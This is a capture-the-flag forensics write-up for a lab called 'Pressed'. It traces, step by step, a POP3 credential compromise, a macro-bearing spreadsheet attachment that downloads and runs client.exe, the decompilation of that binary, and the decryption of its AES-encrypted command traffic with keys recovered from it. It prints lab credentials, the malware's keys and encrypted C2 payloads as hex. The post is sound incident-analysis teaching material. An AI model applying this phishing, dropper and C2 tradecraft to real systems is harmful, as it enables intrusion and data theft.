Pressed
A full-scale intrusion was recently detected within the network, raising critical alarms. - by hadrian3689
The following post by 0xb0b is licensed under CC BY 4.0
A full-scale intrusion was recently detected within the network, raising critical alarms. Fortunately, a packet capture (PCAP) was recorded during the incident, capturing the attacker's initial entry and subsequent actions.
Our task is to analyse the traffic, identify how the attacker gained access, and uncover the sequence of malicious activity.
We download the PCAP file from the box provided and use Wireshark to analyze it.
http://<IP>:8000/traffic.pcapngAnalyzing POP3 Traffic
Starting with packet no. 2448, we see POP3 packets and how someone is trying unsuccessfully to log in with different emails.
Starting with packet 2886, we can detect other POP3 traffic; the attacker was able to log in successfully.
We see it was Hazel's account that got compromised. We are also able to extract the password used.
aGF6ZWxAcHJlc3NlZC50aG0=cGFzc3dvcmQ=
Analysis Of The Attachment
We follow the TCP traffic at packet 2886 and see hazel was pressured to open the sheets.ods file.
We copy the base64 attachment which is the sheets.ods file and decode it.
base64 -d attachment.b64 > sheets.ods
We open that file, and inspect the macros and are able to spot the download and execution of a file called client.exe. Furthermore there is something echoed.
This is the first part of the flag.
Tracing The File Download
Now we know the download and execution of a file. We look for that to find the next part of the flag.
We see the download happens at packet no. 2962.
We follow the TCP stream...
...and swtich from ASCII to RAW!
Next, we save the RAW stream to a file.
Decompilation Of The Malicious File
We remove first lines until the MZ magic bytes.
Using Ghidra, we analyze the executable and inspect the main function.
Here we see a connection setup on port 443, which we will find later in the PCAP.
Furthermore there is some command execution going on that is encrypted by AES:
At the top of the main function we spot the usage of a key variable.
By double clicking on rhI1YazJLaLVgWv4 we find the values used for the encryption.
iv:pEw8P3PU9kCcG4sjkey1:rhI1YazJLaLVgWv4key2:VKf7EQIvl8ps6MJjDecryption Of The C2 Traffic
Back to our traffic on port 443:
We inpect the packet 6728 and 6729 and copy the value of the TCP payload...
fcc44520bbf8344c3c6fff2be387fe59
... and use CyberChef to decrypt the paylaod. We are able to detect the first command issued: whoami
And also its corresponding output:
6a45b8f4ecf91e260471f1dd47d82c5925d9e0356b16f4f9f056dcbc6f77aa6d
On packet no. 6731 we see the creation of another user.
1220b16630b84067c78ffb13915e8735bdb43608954e45203bccc5d8f72c7e4707dced8ae4cb01cfd078bc0051b56a196d85a59bff6d4974325c73b5692827ab
Which happens to be the second part of the flag.
We move on with each command issued:
Packet no. 6735:
ba8ffa0eb7d52a61bed3a892d9411076f4842dc910c643aeaac8204a05f170b9f789c6b7e0aef2de42993ac95ce07659182ce016e3befd6660fdec45804f7364
Packet no. 6741:
5a1e3eeb43af06740acbdbb29a4bec9474cbcda837f96d4e40feb10304e937eb2d4562f7ab9498fa9217da03d5dcb03deb73c51d113dafd215ed6805c4386e4041bc9b64036994e85b10a9aa8a6d376f22b1ce9889acaa4209ddb7459d7155d6cad497fd62ccf465617fea135cf6c905b43a6c1e30c4d0c398f2dc6412093c45aea875d9ca226a938a446f186603d3b0371915b2e3c570891aa677ce6108758087f54f34df1ef78fc9a70412d1c6842bc9e5c3e56ad548c36fe6f4f8966594e3312644da48a65427a45365d1a6ab89a15e1c4e6cd0cf8dfee810a7f1ea0ced12f8b41a85c87809644002cc10a9a7aa6ca5232eb332e74941e8da91c4758f8eb3e5a4cac3d84298b00f96715d4150e01b67f6c285cac26a4afb3858796a61f69ba1d70d47bae714ded2bd9b174344b719921b42c79e4592437825adf0978fb3f1417d206efd3a60f4821811987c4104b514f319d0757961815d5446597c8f077599f9d238bfaeb1fb4643076025c6752eb0b03ce7b225ae8379744fc1c76cf5319a1194a283854318c28146e7401ab9c418a570cef5cd8ae90db476031e142cf8c1841c5fe097e0c7727536a5da5f48e6056f72bcbd9bc6805fadb2c46f12e45eeddbc697ea6d39d6ce3c9fd4c8ae67649f129d63564b78290e2d7b727f537bf5ff50098540903c643112720660b3b22c
Packet no. 6743 - reading clients.csv:
9b8f6df3bd93c3ab10af70c980e231bfac35c591cd0bd0aba8c9104cd30dfbe56b2542aa70e39191db65a5cd2951bcf4
Packet no. 6744 output of clients.csv contains the final part of the flag:
d5303d95b5c8ebea7692402db7118e95bfce2f60ec980d0a0ae57ace971035450d9b1f53ecc5f02ef2efa330fc8b1894ce16cfeedb1e9e73284b65e5a99819721d2fe4c538a671f6edc2394be605ff935988b628cc7e08febf002be9442338f59707e588b535f929a84a89f7ec96b4294e135263145ea196420966ba747d7e90576965fd8e4e39b60f08fe466893338e51e88eeef91f527f5ca51fac6021a19cf9ac8025b4c1e6819740ffa19c2b4f0b3c7ae160c6fcaee2ec81ef2332e71a25e4f67d5cefb21e788a034636282ea0dde4b8e5912db955ab253bcd98fd1467056c3f3814900383ef9d96a4d421a1a0caba4323c97952deb2d7a5cc8bb631acdb31dc05a633676563c20e50f08777b16598f8e497389e9e31648b869843c6cb00be915b5c1992f46ebee1dca68980c722a2c9b6d721e6c9cbb072407dc66b914189c917c74e6db230de6d6d0b3393add952bb4d2f30c45fae06aca3899b6800947eb642a275238e51cbbd6a21c501d98a393069f555843a4d42171a144dad683df6a4f924d6151604b9cd1f74483dc5bbafd1fa035a1fe1d89ec387d71e0100cf891075fb8e35c2505493e8f1626d7532884a0a92a4c64dc406280f628103b185fa75c14f7c46cdab71578f10b987fa0d3a6d80def05b6861f46cf8c4e331eff2aca120871689ac4d85599ec5f066b85c00b9d50d72f3ad858e4ba8eb9e52e96b65ab1fc48bf1f1328ae07dcefedc5f392631ff1c0c111d62fd459691d874ce2dde93a5bae5e6cdbcb0b43deb3a64b81e13bfd10a9480b1f058fa2f95077ffd1a3ffdd1313ef862d1b4bb35101d2d5d5b04bf1be55699e90287b09395ef2e8dd52bcf0f3f319924843bb0726da55608e181711563c8d4258bba912a2c086fce72a8d521efd10c230d40941b19d880f0494628489be6713e2e815c63b62151d4632f1d0e1de2fcd74f09539e7306d989567e5fc6c914a9954e66b1b3798ebf2f5822ffa44bc7102a25f54621d6bdffb745ff8cf9b4f17d84e9080068a4a0fb3845525c1b80c1f1f935f03c7294d809356db973602d4425d3fdfea1082cfcdc5639300e1b9834fc8c5ad7da583dacee616746baf691584ea7a5ac78211c6119f3c533d24d7741efabf39ef8d26c8bfc58bb711c0b1e75a73943254947e9cfb3aae7f9511f78d238d75c1afc40be93214a03
For the final flag we put everything together and base64 decode it.
Last updated
Was this helpful?